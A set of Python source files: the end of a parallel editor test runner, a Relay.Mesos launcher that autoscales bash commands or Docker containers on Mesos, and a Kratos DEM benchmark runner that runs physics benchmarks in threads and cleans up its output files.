t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
for result in results_per_thread:
editor_test_results.update(result)
# Retrieves the number of parallel editors to use, honoring the cmdline override when provided
def _get_number_parallel_editors(self, request):
parallel_editors_value = request.config.getoption("parallel_editors", None)
if parallel_editors_value:
return int(parallel_editors_value)
return self.get_number_parallel_editors()
|
main.py
|
import atexit
import multiprocessing as mp
import json
import signal
import sys
import time
from relay import argparse_shared as at
from relay.runner import main as relay_main, build_arg_parser as relay_ap
from relay_mesos import log
from relay_mesos.util import catch
from relay_mesos.scheduler import Scheduler
def warmer_cooler_wrapper(MV, ns):
"""
Act as a warmer or cooler function such that, instead of executing code,
we ask mesos to execute it.
"""
def _warmer_cooler_wrapper(n):
# inform mesos that it should spin up n tasks of type f, where f is
# either the warmer or cooler. Since Relay assumes that the choice of
# `f` (either a warmer or cooler func) is determined by the sign of n,
# we can too!
log.debug(
'asking mesos to spawn tasks',
extra=dict(
mesos_framework_name=ns.mesos_framework_name,
task_num=n, task_type="warmer" if n > 0 else "cooler"))
t = time.time()
with MV.get_lock():
if MV[1] < t:
MV[:] = (n, t)
log.debug(
'...finished asking mesos to spawn tasks',
extra=dict(
mesos_framework_name=ns.mesos_framework_name,
task_num=n, task_type="warmer" if n > 0 else "cooler"))
return _warmer_cooler_wrapper
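# Illustrative flow: if Relay's event loop decides it needs 3 more "warming" tasks, it calls the
# wrapper with n=3; the wrapper records (3, now) in the shared MV array when the stored request is
# older, and the mesos scheduler acts on MV once enough resource offers arrive.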
def set_signals(mesos, relay, ns):
"""Kill child processes on sigint or sigterm"""
def kill_children(signal, frame):
log.error(
'Received a signal that is trying to terminate this process.'
' Terminating mesos and relay child processes!', extra=dict(
mesos_framework_name=ns.mesos_framework_name,
signal=signal))
try:
mesos.terminate()
log.info(
'terminated mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
except:
log.exception(
'could not terminate mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
try:
relay.terminate()
log.info(
'terminated relay',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
except:
log.exception(
'could not terminate relay',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
sys.exit(1)
signal.signal(signal.SIGTERM, kill_children)
signal.signal(signal.SIGINT, kill_children)
def main(ns):
"""
Run Relay as a Mesos framework.
Relay's event loop and the Mesos scheduler each run in separate processes
and communicate through a multiprocessing.Pipe.
These two processes bounce control back and forth between mesos
resourceOffers and Relay's warmer/cooler functions. Relay warmer/cooler
functions request that mesos tasks get spun up, but those requests are only
filled if the mesos scheduler receives enough relevant offers. Relay's
requests don't build up: only the largest request since the last fulfilled
request is fulfilled the moment enough mesos resources are available.
"""
if ns.mesos_master is None:
log.error(
"Oops! You didn't define --mesos_master",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
build_arg_parser().print_usage()
sys.exit(1)
if not ns.mesos_task_resources:
log.warn(
"You didn't define '--mesos_task_resources'."
" Tasks may not start on slaves",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
log.info(
"Starting Relay Mesos!",
extra={k: str(v) for k, v in ns.__dict__.items()})
# a distributed value storing the num and type of tasks mesos scheduler
# should create at any given moment in time.
# Sign of MV determines task type: warmer or cooler
# ie. A positive value of n means n warmer tasks
MV = mp.Array('d', [0, 0]) # shared array of two c_doubles: (signed task count, request timestamp)
# store exceptions that may be raised
exception_receiver, exception_sender = mp.Pipe(False)
# notify relay when mesos framework is ready
mesos_ready = mp.Condition()
# copy and then override warmer and cooler
ns_relay = ns.__class__(**{k: v for k, v in ns.__dict__.items()})
if ns.warmer:
ns_relay.warmer = warmer_cooler_wrapper(MV, ns)
if ns.cooler:
ns_relay.cooler = warmer_cooler_wrapper(MV, ns)
mesos_name = "Relay.Mesos Scheduler"
mesos = mp.Process(
target=catch(init_mesos_scheduler, exception_sender),
kwargs=dict(ns=ns, MV=MV, exception_sender=exception_sender,
mesos_ready=mesos_ready),
name=mesos_name)
relay_name = "Relay.Runner Event Loop"
relay = mp.Process(
target=catch(init_relay, exception_sender),
args=(ns_relay, mesos_ready, ns.mesos_framework_name),
name=relay_name)
mesos.start() # start mesos framework
relay.start() # start relay's loop
set_signals(mesos, relay, ns)
while True:
if exception_receiver.poll():
exception_receiver.recv()
log.error(
'Terminating child processes because one of them raised'
' an exception', extra=dict(
is_relay_alive=relay.is_alive(),
is_mesos_alive=mesos.is_alive(),
mesos_framework_name=ns.mesos_framework_name))
break
if not relay.is_alive():
log.error(
"Relay died. Check logs to see why.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
break
if not mesos.is_alive():
log.error(
"Mesos Scheduler died and didn't notify me of its exception."
" This may be a code bug. Check logs.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
break
# save cpu cycles by checking for subprocess failures less often
if ns.delay > 5:
time.sleep(5)
else:
time.sleep(ns.delay)
relay.terminate()
mesos.terminate()
sys.exit(1)
def init_relay(ns_relay, mesos_ready, mesos_framework_name):
log.debug(
'Relay waiting to start until mesos framework is registered',
extra=dict(mesos_framework_name=mesos_framework_name))
mesos_ready.acquire()
mesos_ready.wait()
log.debug(
'Relay notified that mesos framework is registered',
extra=dict(mesos_framework_name=mesos_framework_name))
relay_main(ns_relay)
def init_mesos_scheduler(ns, MV, exception_sender, mesos_ready):
import mesos.interface
from mesos.interface import mesos_pb2
try:
import mesos.native
except ImportError:
log.error(
"Oops! Mesos native bindings are not installed. You can download"
" these binaries from mesosphere.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
raise
log.info(
'starting mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
# build framework
framework = mesos_pb2.FrameworkInfo()
framework.user = "" # Have Mesos fill in the current user.
framework.name = "Relay.Mesos: %s" % ns.mesos_framework_name
if ns.mesos_framework_principal:
framework.principal = ns.mesos_framework_principal
if ns.mesos_framework_role:
framework.role = ns.mesos_framework_role
if ns.mesos_checkpoint:
framework.checkpoint = True
# build driver
driver = mesos.native.MesosSchedulerDriver(
Scheduler(
MV=MV, exception_sender=exception_sender, mesos_ready=mesos_ready,
ns=ns),
framework,
ns.mesos_master)
atexit.register(driver.stop)
# run things
status = 0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1
driver.stop() # Ensure that the driver process terminates.
sys.exit(status)
# This add_argument func will prefix env vars with RELAY_MESOS.
# The normal at.add_argument func prefixes env vars with RELAY_
# Let's use the at.add_argument func for --mesos_XXX and the below for --XXX
add_argument = at.add_argument_default_from_env_factory(
env_prefix='RELAY_MESOS_')
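# For example (assuming these helpers derive the env var name from the flag name, which is not shown
# here): --uris added via the local add_argument would default from RELAY_MESOS_URIS, while
# --mesos_master added via at.add_argument would default from RELAY_MESOS_MASTER.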
build_arg_parser = at.build_arg_parser([
at.group(
"How does Relay.mesos affect your metric?",
at.warmer(type=str, help=(
"A bash command to run on a mesos slave."
" A warmer should eventually increase metric values.")),
at.cooler(type=str, help=(
"A bash command to run on a mesos slave."
" A cooler should eventually decrease metric values.")),
),
at.group(
"Relay.Mesos parameters",
at.add_argument(
'--mesos_master',
help="URI to mesos master. We support whatever mesos supports"
),
at.add_argument(
'--mesos_framework_principal',
type=str, help=(
"If you use Mesos Framework Rate Limiting, this framework's"
" principal identifies which rate limiting policy to apply")),
at.add_argument(
'--mesos_framework_role',
type=str, help=(
"If you use Mesos Access Control Lists (ACLs) or apply"
" weighting to frameworks, your framework needs to register"
" with a role.")),
at.add_argument(
'--mesos_framework_name',
default='framework',
help="Name the framework so you can identify it in the Mesos UI"),
at.add_argument(
'--mesos_checkpoint', action='store_true', default=False,
help=(
"This option enables Mesos Framework checkpointing. This"
" means that tasks spun up by Relay.Mesos will survive even if"
" this Relay.Mesos instance dies.")),
at.add_argument(
'--mesos_task_resources',
type=lambda x: dict(
y.split('=') for y in x.replace(' ', ',').split(',')),
default={}, help=(
"Specify what resources your task needs to execute. These"
" can be any recognized mesos resource and must be specified"
" as a string or comma separated list. ie:"
" --mesos_task_resources cpus=10,mem=30000"
)),
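# (Illustrative: with the parser above, "cpus=10,mem=30000" becomes {"cpus": "10", "mem": "30000"};
# values are kept as strings.)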
at.add_argument(
'--mesos_environment', type=lambda fp: [
tuple(y.strip() for y in x.strip().split('=', 1))
for x in open(fp).readlines()],
default=[], help=(
"A filepath containing environment variables to define on all"
" warmer and cooler tasks."
"File should contain one variable per line, in form VAR1=VAL1"
)),
add_argument(
'--uris', type=lambda x: x.split(','), default=[], help=(
"Comma-separated list of URIs to load before running command"
)),
add_argument(
'--max_failures', type=int, default=-1, help=(
"If tasks are failing too often, stop the driver and raise"
" an error. If given, this (always positive) number"
" is a running count of (failures - successes - starting)"
" tasks. It is sensitive to many consecutive failures and"
" will mostly ignore failures if a lot of tasks"
" are starting or completing at once"
)),
),
at.group(
"Relay.Mesos Docker parameters",
add_argument(
'--docker_parameters', default={}, type=json.loads, help=(
"Supply arbitrary command-line options for the docker run"
"command executed by the Mesos containerizer. Note that any"
"parameters passed in this manner are not guaranteed to be"
"supported in the future. Pass parameters as a JSON dict:\n"
' --docker_parameters \'{"volumes-from": "myimage", ...}\''
)),
add_argument(
'--docker_image', help=(
"The name of a docker image if you wish to execute the"
" warmer and cooler in it")),
add_argument(
'--docker_network', choices=("HOST", "BRIDGE", "NONE"),
default="BRIDGE", help=(
"Docker: Set the Network mode for the container: --net ")),
add_argument(
'--force_pull_image', action='store_true', default=False,
help=(
"Before Relay.Mesos starts a docker container, ensure that the"
" container image is the most recently updated in the registry"
)),
add_argument(
'--volumes',
type=lambda x: tuple(tuple(y.split(':')) for y in x.split(',')),
default=[], help=(
"If using containers, you may wish to mount volumes into those"
" containers. Define the volumnes you wish to mount as"
" a comma-separated list of volumes with the"
" following format:"
" --mesos_volumes host_path:container_path:mode,"
"host_path2:container_path2:mode,...")),
),
],
description=(
"Use Relay to auto-scale instances of a bash command"
" or docker container on Mesos"),
parents=[relay_ap()], conflict_handler='resolve')
if __name__ == '__main__':
NS = build_arg_parser().parse_args()
main(NS)
|
DEM_run_all_benchmarks_grid.py
|
from __future__ import print_function
import os
import subprocess
import sys
import multiprocessing as mp
import queue
from threading import Thread
import threading
from glob import glob
import shutil
import KratosMultiphysics.kratos_utilities as kratos_utils
kratos_benchmarking_path = os.path.join('..','..','..','benchmarking')
sys.path.append(kratos_benchmarking_path)
path = os.path.join('..','test_examples')
sys.path.append(path)
path = os.getcwd()
path = os.path.join(path,'basic_benchmarks')
os.chdir(path)
if "OMP_NUM_THREADS" in os.environ:
max_available_threads = int(os.environ['OMP_NUM_THREADS'])
else:
max_available_threads = mp.cpu_count() - 1
if max_available_threads == 0:
max_available_threads = 1
#initial_number_of_threads = os.environ['OMP_NUM_THREADS']
os.environ['OMP_NUM_THREADS']='1'
os.system("echo Benchmarks will be running on $OMP_NUM_THREADS cpu")
Benchmark_text = ["Running DEM Benchmark 1.... Elastic normal impact of two identical spheres\n",
"Running DEM Benchmark 2.... Elastic normal impact of a sphere against a rigid plane\n",
"Running DEM Benchmark 3.... Impact of a sphere against a rigid plane with different coefficients of restitution\n",
"Running DEM Benchmark 4.... Oblique impact of a sphere with a rigid plane with constant velocity module and variable incident angles\n",
"Running DEM Benchmark 5.... Oblique impact of a sphere with a rigid plane with constant normal velocity and different tangential velocities\n",
"Running DEM Benchmark 6.... Impact of a sphere with a rigid plane with a constant normal velocity and variable angular velocities\n",
"Running DEM Benchmark 7.... Impact of two identical spheres with a constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 8.... Impact of two differently sized spheres with a constant normal velocity and variable angular velocities\n",
"Running DEM Benchmark 9.... Impact of two identical spheres with a constant normal velocity and different coefficients of restitution\n",
"Running DEM Benchmark 10... Linear: Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 11... Hertzian: Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 12... Sphere rotating over a plane surface with Rolling Friction\n",
"Running DEM Benchmark 13... Impact of a low stiffness sphere against a rigid plane divided in small triangular elements\n",
"Running DEM Benchmark 14... Impact of a low stiffness sphere against a rigid edge divided in small triangular elements\n",
"Running DEM Benchmark 15... Impact of a low stiffness sphere against a rigid vertex divided in small triangular elements\n",
"Running DEM Benchmark 16... Spheres contacting multiple entities (facets, edges and vertices)\n",
"Running DEM Benchmark 17... Sphere sliding on a plane (discretized with triangles and quadrilaterals) with friction\n",
"","",
"Running DEM Benchmark 20... Normal compression of two identical spheres\n",\
"Running DEM Benchmark 21... Normal compression of two identical indented spheres\n",\
"Running DEM Benchmark 22... Tensile test of two identical spheres\n",\
"Running DEM Benchmark 23... Tensile test of two identical indented spheres\n",\
"Running DEM Benchmark 24... Shear test of two identical spheres by applying rotation\n",\
"Running DEM Benchmark 25... Shear test of two identical spheres by applying rotation and radius expansion\n",\
"","","","",
"Running DEM Benchmark 30... Cylinder cluster with imposed angular velocity in two axis (Velocity Verlet + Zhao scheme)\n",
"Running DEM Benchmark 31... Cylinder cluster with imposed angular velocity in two axis (Symplectic Euler + Runge-Kutta scheme)\n",
"Running DEM Benchmark 32... Fiber cluster bouncing without any damping (Velocity Verlet + Zhao scheme)\n",
"Running DEM Benchmark 33... Fiber cluster bouncing without any damping (Symplectic Euler + Runge-Kutta scheme)\n",
"","","","","","",
"Running DEM Benchmark 40... Generic test for code functionalities verification\n"]
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
def run(benchmark, file_for_output):
path_to_callable_script = os.path.join(path, "DEM_benchmarks_analysis.py")
py_cmd = "python3" if shutil.which("python3") is not None else "python"
subprocess.check_call([py_cmd, path_to_callable_script, str(benchmark)], stdout=file_for_output, stderr=file_for_output)
def worker(queue):
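# iter(queue.get, None) keeps pulling benchmark ids until the None sentinel is received
# (main() pushes one None per worker thread to signal that there is no more work)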
for benchmark in iter(queue.get, None):
out_file_name = '{0}.info'.format(benchmark)
f = open(out_file_name, 'wb')
print(Benchmark_text[benchmark - 1])
try:
run(benchmark, f)
except Exception:  # catch exceptions to avoid exiting the thread prematurely
with open(out_file_name, 'r') as fin:
print(fin.read())
print("A problem was found in DEM Benchmark " + str(benchmark) + "... Resuming...\n")
g = open("errors.err", "a")
g.write("DEM Benchmark " + str(benchmark) + ": KO!........ Test " + str(benchmark) + " FAILED\n")
g.close()
f.close()
file_to_remove = out_file_name
kratos_utils.DeleteFileIfExisting(GetFilePath(file_to_remove))
def main():
try:
print("\nAdding processes to DEM parallel Benchmarking..............\n")
delete_archives()
g = open("errors.err", "w")
g.write("The complete list of benchmarks are included at the end of this message as a quick reference.\n")
g.close()
Text = ""
q = queue.Queue()
#### Discontinuum Tests.
D_DEM_Benchmarks_list = list(range(1,18))
#### Continuum Tests
C_DEM_Benchmarks_list = list(range(20,26))
#### Discontinuum Clusters Tests. From 30 to 33
Dcl_DEM_Benchmarks_list = list(range(30,34))
#### Generic test for code functionalities verification
Gen_DEM_Benchmarks_list = list(range(40,41))
Total_DEM_Benchmarks_list = D_DEM_Benchmarks_list + C_DEM_Benchmarks_list + Dcl_DEM_Benchmarks_list + Gen_DEM_Benchmarks_list
for item in Total_DEM_Benchmarks_list:
#print(Benchmark_text[item - 1])
q.put_nowait(item)
threads = [Thread(target=worker, args=(q,)) for _ in range(int(max_available_threads))]
for t in threads:
t.daemon = True # threads die if the program dies
t.start()
for _ in threads: q.put_nowait(None) # signal no more benchmarks
for t in threads: t.join() # wait for completion
print('\n')
g = open("errors.err", 'a')
g.write("\n---------------------------------------------------------------------\n")
g.write("\nList of Benchmarks:\n")
g.write("\nDISCONTINUUM TESTS:\n")
g.write("Benchmark 01. Elastic normal impact of two identical spheres\n")
g.write("Benchmark 02. Elastic normal impact of a sphere against a rigid plane\n")
g.write("Benchmark 03. Impact of a sphere against a rigid plane with different coefficients of restitution\n")
g.write("Benchmark 04. Oblique impact of a sphere with a rigid plane with constant velocity module and variable incident angles\n")
g.write("Benchmark 05. Oblique impact of a sphere with a rigid plane with constant normal velocity and different tangential velocities\n")
g.write("Benchmark 06. Impact of a sphere with a rigid plane with a constant normal velocity and variable angular velocities\n")
g.write("Benchmark 07. Impact of two identical spheres with a constant normal velocity and different angular velocities\n")
g.write("Benchmark 08. Impact of two differently sized spheres with a constant normal velocity and variable angular velocities\n")
g.write("Benchmark 09. Impact of two identical spheres with a constant normal velocity and different coefficients of restitution\n")
g.write("Benchmark 10. Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n")
g.write("Benchmark 11. Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n")
g.write("Benchmark 12. Sphere rotating over a plane surface with Rolling Friction\n")
g.write("Benchmark 13. Impact of a low stiffness sphere against a rigid plane divided in small triangular elements\n")
g.write("Benchmark 14. Impact of a low stiffness sphere against a rigid edge divided in small triangular elements\n")
g.write("Benchmark 15. Impact of a low stiffness sphere against a rigid vertex divided in small triangular elements\n")
g.write("Benchmark 16. Spheres contacting multiple entities (facets, edges and vertices)\n")
g.write("Benchmark 17. Sphere sliding on a plane (discretized with triangles and quadrilaterals) with friction\n")
g.write("\nCONTINUUM TESTS:\n")
g.write("Benchmark 20. Normal compression of two identical spheres\n")
g.write("Benchmark 21. Normal compression of two identical indented spheres\n")
g.write("Benchmark 22. Tensile test of two identical spheres\n")
g.write("Benchmark 23. Tensile test of two identical indented spheres\n")
g.write("Benchmark 24. Shear test of two identical spheres by applying rotation\n")
g.write("Benchmark 25. Shear test of two identical spheres by applying rotation and radius expansion\n")
g.write("\nDISCONTINUUM CLUSTERS TESTS:\n")
g.write("Benchmark 30. Cylinder cluster with imposed angular velocity in two axis (Velocity Verlet + Zhao scheme)\n")
g.write("Benchmark 31. Cylinder cluster with imposed angular velocity in two axis (Symplectic Euler + Runge-Kutta scheme)\n")
g.write("Benchmark 32. Fiber cluster bouncing without any damping (Velocity Verlet + Zhao scheme)\n")
g.write("Benchmark 33. Fiber cluster bouncing without any damping (Symplectic Euler + Runge-Kutta scheme)\n")
g.write("\nGENERIC TEST:\n")
g.write("Benchmark 40. Generic test for code functionalities verification\n")
g.close()
g = open("errors.err")
file_contents = g.read()
g.close()
os.remove("errors.err")
Text += file_contents.rstrip("\n")
Text += "\n\n\n"
delete_archives()
return Text
except:
delete_archives()
def delete_archives():
files_to_delete_list = glob('*.time')
files_to_delete_list.extend(glob('*.dat'))
files_to_delete_list.extend(glob('*.gp'))
files_to_delete_list.extend(glob('*.txt'))
files_to_delete_list.extend(glob('*.lst'))
files_to_delete_list.extend(glob('*.info'))
files_to_delete_list.extend(glob('*.err'))
files_to_delete_list.extend(glob('*.hdf5'))
for to_erase_file in files_to_delete_list:
try:
os.remove(to_erase_file)
except OSError:
pass
folders_to_delete_list = []
folders_to_delete_list.extend(glob('*ists'))
folders_to_delete_list.extend(glob('*ults'))
folders_to_delete_list.extend(glob('*he__'))
folders_to_delete_list.extend(glob('*aphs'))
folders_to_delete_list.extend(glob('*iles'))
for to_erase_folder in folders_to_delete_list:
try:
shutil.rmtree(to_erase_folder)
except OSError:
pass
if __name__ == '__main__':
mp.freeze_support() # optional if the program is not frozen
print(main())
|